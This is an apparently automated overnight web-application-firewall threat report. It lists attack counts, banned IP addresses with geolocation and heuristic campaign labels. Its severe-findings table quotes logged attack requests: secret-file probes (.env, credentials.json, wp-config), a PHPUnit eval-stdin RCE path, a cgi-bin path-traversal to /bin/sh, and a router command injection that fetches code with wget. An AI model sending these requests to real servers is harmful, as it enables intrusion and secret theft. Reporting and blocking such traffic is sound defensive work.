# Binteca Threat Map: night ending 2026-10-06

Window: 2026-10-05T18:00:00+02:00 to 2026-10-06T06:00:00+02:00 (UTC+02:00). Target point: Johannesburg, ZA.

## Totals

| Metric | Overnight |
|---|---:|
| Attacks at the edge | 2,771 |
| New bans at the edge | 31 |
| Attacks (all sensors) | 3,930 |
| New bans (all sensors) | 122 |
| Requests seen | 38,920 |
| Blocked at the edge | 1,184 |
| Active bans at report time | 56 |
| Sensors reporting | 4 |

| Sensor | Kind | Attacks | New bans | Active bans |
|---|---|---:|---:|---:|
| edge | edge | 2,771 | 31 | 29 |
| web-1 | web | 174 | 6 | 1 |
| web-2 | web | 119 | 9 | 3 |
| web-3 | web | 866 | 76 | 23 |

## Attack categories

| Category | Attacks |
|---|---:|
| cms-probe | 2,364 |
| secret-probe | 1,070 |
| protocol | 240 |
| code-injection | 148 |
| scanner | 104 |
| behaviour | 1 |

## Banned identifiers

- IP addresses banned: **103** (122 ban actions)
- E-mail addresses banned: 0
- Other identifiers banned: 0
- The WAF bans network addresses only; no e-mail or account identifiers appear in the source.

| IP | Country | City | ASN / org | Attack types | Bans | Max offence | State | Tags | Suspected actor (confidence) |
|---|---|---|---|---|---:|---:|---|---|---|
| `20.214.109.68` | KR | Yongsan-dong | AS8075 Microsoft Corporation | cms-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `45.138.12.27` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | credential-probe, php-probe | 1 | 1 | expired | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `49.0.202.115` | SG | Singapore | AS136907 HUAWEI INTERNATIONAL PTE. LTD. | rce-payload | 1 | 4 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `54.94.85.181` | BR | São Paulo | AS16509 Amazon.com, Inc. | secret-probe, credential-probe, cms-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `223.123.92.102` | PK | Karachi | AS59257 CMPak Limited | rce-payload | 1 | 2 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `193.32.204.199` | TR | Istanbul | AS153622 Madina IT | secret-probe | 1 | 3 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `82.102.18.180` | FR | Saint-Denis | AS9009 M247 Europe SRL | cms-probe | 1 | 1 | expired | hosting-provider, cluster:82.102.18.0/24 | Suspected CMS exploitation bot (medium) |
| `34.237.176.214` | US | Ashburn | AS14618 Amazon.com, Inc. | secret-probe | 7 | 3 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `165.154.218.226` | US | Los Angeles | AS135377 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | rce-payload | 2 | 2 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `45.148.10.171` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 3 | 2 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `80.94.92.65` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 3 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting | Suspected credential/secret-harvesting campaign (medium) |
| `104.244.74.39` | LU | Bissen | AS53667 FranTech Solutions | secret-probe | 2 | 4 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `138.68.86.32` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 2 | 2 | active | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `193.32.126.155` | FR | Aubervilliers | AS39351 31173 Services AB | secret-probe | 2 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `45.138.12.21` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 2 | 2 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.120` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe, credential-probe | 2 | 2 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `66.240.223.214` | US | San Diego (Kearny Mesa) | AS10439 CariNet, Inc. | attack-tool | 2 | 2 | expired | repeat-offender, cluster:66.240.223.0/24 | Automated attack tool (medium) |
| `66.240.223.240` | US | San Diego (Kearny Mesa) | AS10439 CariNet, Inc. | attack-tool | 2 | 2 | active | repeat-offender, cluster:66.240.223.0/24 | Automated attack tool (medium) |
| `68.69.177.112` | US | Hollis | AS402226 OnlyScans LLC | php-probe | 2 | 2 | active | research-scanner, repeat-offender | Internet research scanner (benign) (medium) |
| `102.220.163.155` | SI | Ljubljana | AS197769 VPS Dedicated LLC | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, hosting-provider | Suspected credential/secret-harvesting campaign (medium) |
| `103.146.23.23` | VN | Tây Mỗ | AS131366 Lanit Technology and Communication Joint Stock Company | rce-payload | 1 | 1 | active |  | Suspected exploit/RCE bot (low) |
| `103.216.170.129` | IN | Mumbai (Navjeevan Society) | AS135198 Bombay Bullion Commmunication | rce-payload | 1 | 2 | expired | repeat-offender | Suspected exploit/RCE bot (low) |
| `103.46.186.148` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 1 | 2 | expired | repeat-offender | Suspected exploit/RCE bot (low) |
| `104.234.186.154` | BR | São Paulo | AS269070 Hostzone Tecnologia LTDA | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `111.90.180.172` | KH | Phnom Penh | AS38235 Angkor Data Communication | credential-probe | 1 | 3 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `120.48.171.196` | CN | Jinrongjie (Xicheng District) | AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd. | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `120.48.22.219` | CN | Jinrongjie (Xicheng District) | AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd. | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `128.199.182.55` | SG | Singapore (Pioneer) | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `129.213.151.234` | US | Ashburn | AS31898 Oracle Corporation | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `13.89.126.19` | US | Des Moines | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `130.12.180.117` | NL | Amsterdam | AS202412 Omegatech LTD | secret-probe | 1 | 2 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `136.107.20.139` | US | Washington D.C. | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `139.59.136.184` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | expired | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `142.93.129.190` | NL | Amsterdam | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `143.244.168.161` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `147.182.149.75` | CA | Etobicoke | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `157.245.204.205` | SG | Singapore (Pioneer) | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `159.223.132.86` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `159.89.12.166` | DE | Rottweil | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `160.176.79.216` | MA | Kenitra | AS36903 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `164.92.107.174` | US | Santa Clara | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | expired | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `165.227.84.14` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `165.99.207.153` | PK | Islamabad (E-8) | AS45773 HEC | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `167.99.181.249` | CA | Toronto | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `176.65.148.150` | NL | Eygelshoven | AS51396 Pfcloud UG (haftungsbeschrankt) | rce-payload | 1 | 2 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Known-bad scanning infrastructure (medium) |
| `176.65.149.188` | NL | Eygelshoven | AS51396 Pfcloud UG (haftungsbeschrankt) | attack-tool | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting | Known-bad scanning infrastructure (medium) |
| `186.182.105.49` | PY | Ciudad del Este | AS11664 Techtel LMDS Comunicaciones Interactivas S.A. | rce-payload | 1 | 2 | expired | repeat-offender | Suspected exploit/RCE bot (low) |
| `187.108.1.142` | BR | Joinville | AS28267 SIM INTERNET PROVEDORES DE INTERNET EIRELI. | attack-tool | 1 | 3 | active | repeat-offender | Automated attack tool (low) |
| `193.32.162.157` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `20.14.88.130` | US | Phoenix | AS8075 Microsoft Corporation | attack-tool | 1 | 1 | expired | hosting-provider | Automated attack tool (low) |
| `20.163.10.217` | US | Phoenix | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.194.30.107` | KR | Yongsan-dong | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `20.194.96.114` | KR | Yongsan-dong | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `20.219.14.152` | IN | Pune | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `20.64.98.9` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.65.145.206` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.65.178.72` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.80.111.73` | US | Des Moines | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.84.75.121` | US | Ashburn | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `206.189.95.232` | SG | Singapore (Pioneer) | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `206.81.12.187` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `206.81.24.227` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `207.154.197.113` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `209.38.248.17` | DE | Ediger-Eller | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `212.231.226.20` | ES | Barcelona | AS15704 XTRA TELECOM S.A. | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `221.159.119.6` | KR | Seongnam-si (Jeongja-dong) | AS4766 Korea Telecom | command-injection | 1 | 2 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `23.180.120.153` | FR | Paris | AS53514 UHQ Services LLC | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `34.156.206.32` | BE | Brussels | AS396982 Google LLC | credential-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.79.12.228` | BE | Brussels | AS396982 Google LLC | credential-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.81.90.137` | TW | Taoyuan | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.85.106.58` | JP | Shibuya City | AS396982 Google LLC | credential-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.189.229.134` | BE | Brussels | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.215.59.170` | CA | Montreal | AS43515 Google Ireland Limited | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.217.150.248` | JP | Osaka | AS15169 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.240.194.248` | SG | Singapore | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `4.148.17.77` | US | Phoenix | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `40.124.168.91` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `40.124.172.22` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `40.124.186.173` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider, cluster:40.124.186.0/24 | Suspected exploit/RCE bot (medium) |
| `40.124.186.184` | US | San Antonio | AS8075 Microsoft Corporation | attack-tool | 1 | 1 | expired | hosting-provider, cluster:40.124.186.0/24 | Automated attack tool (medium) |
| `40.86.204.64` | CA | Québec | AS8075 Microsoft Corporation | cms-probe | 1 | 2 | expired | hosting-provider, repeat-offender | Suspected CMS exploitation bot (low) |
| `45.138.12.10` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 1 | active | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.138.12.51` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 4 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.138.12.6` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 3 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.141.26.3` | TH | Bang Rak (Khwaeng Thung Maha Mek) | AS142299 CLOUDFOREST CO.,LTD | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `45.153.102.164` | IE | Bagenalstown | AS203020 HostRoyale Technologies Pvt Ltd | secret-probe | 1 | 2 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `45.156.87.131` | NL | Amsterdam | AS197170 TechTies Inc. | credential-probe | 1 | 2 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `45.195.231.146` | TR | Ankara | AS214941 UPCELL TELEKOMUNIKASYON LIMITED SIRKETI | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `45.43.60.98` | JP | Shibuya City | AS135377 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `52.165.83.218` | US | Des Moines | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `64.225.75.246` | NL | Amsterdam | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `64.226.65.160` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `64.227.32.66` | GB | Slough | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | active | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `65.49.1.94` | US | Pleasanton | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | firehol-level1, research-scanner | Internet research scanner (benign) (high) |
| `73.53.43.220` | US | Everett | AS7922 Comcast Cable Communications, LLC | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `82.102.18.116` | FR | Saint-Denis | AS9009 M247 Europe SRL | cms-probe | 1 | 1 | expired | hosting-provider, cluster:82.102.18.0/24 | Suspected CMS exploitation bot (medium) |
| `84.247.157.60` | FR | Marseille | AS141995 Contabo Asia Private Limited | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `87.126.145.190` | BG | Sofia | AS8866 Vivacom Bulgaria EAD | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `89.126.211.166` | UZ | Tashkent | AS202660 "Uzbektelekom" Joint Stock Company | rce-payload | 1 | 3 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `91.92.240.86` | DE | Frankfurt am Main (Bergen-Enkheim) | AS202412 Omegatech LTD | secret-probe | 1 | 4 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `91.92.41.115` | BG | Sofia | AS211443 SINO WORLDWIDE TRADING LIMITED | secret-probe, rce-payload | 1 | 1 | expired |  | Suspected Androxgh0st-style Laravel/PHPUnit exploitation (low) |
| `94.143.143.250` | ES | Madrid | AS8560 IONOS SE | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `94.243.10.91` | RU | Ishim | AS8359 MTS PJSC | command-injection | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |

## Top sources by request count

| IP | Requests | Country | ASN / org | Status |
|---|---:|---|---|---|
| `20.219.185.206` | 185 | IN | AS8075 Microsoft Corporation | ban expired 18:30 |
| `20.214.109.68` | 184 | KR | AS8075 Microsoft Corporation | ban expired 05:14 |
| `87.121.84.174` | 140 | NL | AS197170 TechTies Inc. | spared: shared address |
| `45.138.12.27` | 81 | HK | AS218785 TC DATACENTER LIMITED | spared: shared address |
| `35.241.178.74` | 81 | BE | AS396982 Google LLC | spared: shared address |
| `49.0.202.115` | 48 | SG | AS136907 HUAWEI INTERNATIONAL PTE. LTD. | banned until Tue 13 Oct 03:57 |
| `54.94.85.181` | 45 | BR | AS16509 Amazon.com, Inc. | ban expired 20:04 |
| `223.123.92.102` | 39 | PK | AS59257 CMPak Limited | banned until Tue 08:54 |
| `193.32.204.199` | 32 | TR | AS153622 Madina IT | banned until Tue 19:33 |
| `82.102.18.180` | 23 | FR | AS9009 M247 Europe SRL | ban expired 01:34 |
| `206.189.39.32` | 6 | SG | AS14061 DigitalOcean, LLC | not banned |
| `74.161.160.33` | 6 | CH | AS8075 Microsoft Corporation | not banned |
| `64.94.84.84` | 5 | US | AS399629 BL Networks | not banned |
| `34.237.176.214` | 2 | US | AS14618 Amazon.com, Inc. | ban expired 05:35 |
| `165.154.218.226` | 2 | US | AS135377 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | banned until Tue 06:29 |
| `134.33.66.210` | 1 | US | AS8075 Microsoft Corporation | not banned |

## Most severe findings

| Severity | Rule | Requests | Addresses | First | Example source | Example request |
|---|---|---:|---:|---|---|---|
| critical | Secret or VCS file probe (BW-SEC-01) | 549 | 32 | 18:02 | `45.138.12.28` | `GET /admin/.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 44 | 11 | 18:02 | `45.138.12.28` | `GET /credentials.json` |
| critical | PHP or shell payload (BW-RCE-03) | 1 | 1 | 22:06 | `91.92.41.115` | `GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php` |
| critical | Secret or VCS file probe (BW-SEC-01) | 148 | 5 | 18:11 | `45.148.10.171` | `GET /.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 10 | 2 | 19:59 | `45.138.12.27` | `GET /database.sql` |
| critical | PHP or shell payload (BW-RCE-03) | 3 | 2 | 22:25 | `20.84.75.121` | `GET /autodiscover/autodiscover.json?[[[@]]]zdi/Powershell` |
| critical | Secret or VCS file probe (BW-SEC-01) | 26 | 5 | 18:11 | `45.148.10.171` | `GET /.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 23 | 2 | 19:04 | `54.94.85.181` | `GET /wp-config.php.save` |
| critical | PHP or shell payload (BW-RCE-03) | 4 | 3 | 19:52 | `120.48.171.196` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 261 | 34 | 18:10 | `45.148.10.171` | `GET /.env` |
| critical | PHP or shell payload (BW-RCE-03) | 138 | 27 | 18:06 | `87.126.145.190` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 9 | 4 | 21:29 | `87.121.84.174` | `GET /wp-config.php` |
| critical | Shell command injection (BW-RCE-02) | 3 | 2 | 02:18 | `221.159.119.6` | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0…` |
| high | Attack tool user agent (BW-UA-01) | 5 | 4 | 18:12 | `187.108.1.142` | `GET /` |
| high | Run of missing-page requests (BW-BEH-01) | 1 | 1 | 18:02 | `45.138.12.28` | `GET /config.env` |
| high | Attack tool user agent (BW-UA-01) | 4 | 4 | 21:29 | `20.65.201.226` | `GET /actuator/health` |
| high | Attack tool user agent (BW-UA-01) | 12 | 9 | 18:14 | `187.108.1.142` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 83 | 51 | 18:01 | `187.108.1.142` | `GET /` |
| medium | PHP script probe (BW-PHP-01) | 8 | 2 | 19:59 | `45.138.12.27` | `GET /api/phpinfo.php` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 38 | 5 | 19:04 | `54.94.85.181` | `GET /Jenkinsfile` |

## Suspected actors and campaigns

Labels are heuristic groupings of infrastructure and behaviour, **not attribution**. See the README.

| Suspected actor / campaign | Confidence | Addresses | Top countries | Evidence |
|---|---|---:|---|---|
| Suspected credential/secret-harvesting campaign | medium | 36 | HK 6, NL 5, US 3, BE 3, AD 2 | hunts for .env, VCS or credential files; listed on Spamhaus DROP; listed on FireHOL level 1; AS218785 TC DATACENTER (abuse-prone hosting) |
| Suspected exploit/RCE bot | medium | 28 | US 12, PK 2, SG 1, VN 1, IN 1 | sent a shell or PHP payload; 2 addresses from 40.124.186.0/24 (AS8075) attacked the same night |
| Internet research scanner (benign) | high | 24 | US 9, DE 7, SG 3, NL 2, CA 2 | reverse DNS b69efeaf93.scan.leakix.org; reverse DNS d5f757a6.scanners.onlyscans.net; reverse DNS ea73d34464.scan.leakix.org; reverse DNS c3ee778768.scan.leakix.org |
| Suspected CMS exploitation bot | medium | 7 | KR 3, FR 2, IN 1, CA 1 | CMS, admin panel or PHP script probing; 2 addresses from 82.102.18.0/24 (AS9009) attacked the same night |
| Automated attack tool | medium | 6 | US 5, BR 1 | request carried a known attack-tool user agent; 2 addresses from 66.240.223.0/24 (AS10439) attacked the same night; 2 addresses from 40.124.186.0/24 (AS8075) attacked the same night |
| Unattributed automated probe | low | 5 | IN 1, BE 1, SG 1, CH 1, US 1 |  |
| Known-bad scanning infrastructure | medium | 3 | NL 2, US 1 | listed on Spamhaus DROP; listed on FireHOL level 1; AS51396 Pfcloud (abuse-prone hosting); AS399629 BL Networks (abuse-prone hosting) |
| Suspected Mirai-style IoT botnet | medium | 2 | CN 1, BG 1 | IoT/router exploit path with a downloader typical of Mirai-family loaders |
| Suspected Androxgh0st-style Laravel/PHPUnit exploitation | low | 1 | BG 1 | probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A; no request bodies are logged, so the malware family cannot be confirmed |

_Binteca Threat Map (https://cybermap.binteca.io), generated 2026-10-07T11:35:12Z from the overnight WAF summary. Geolocation: DB-IP Lite (CC BY 4.0)._
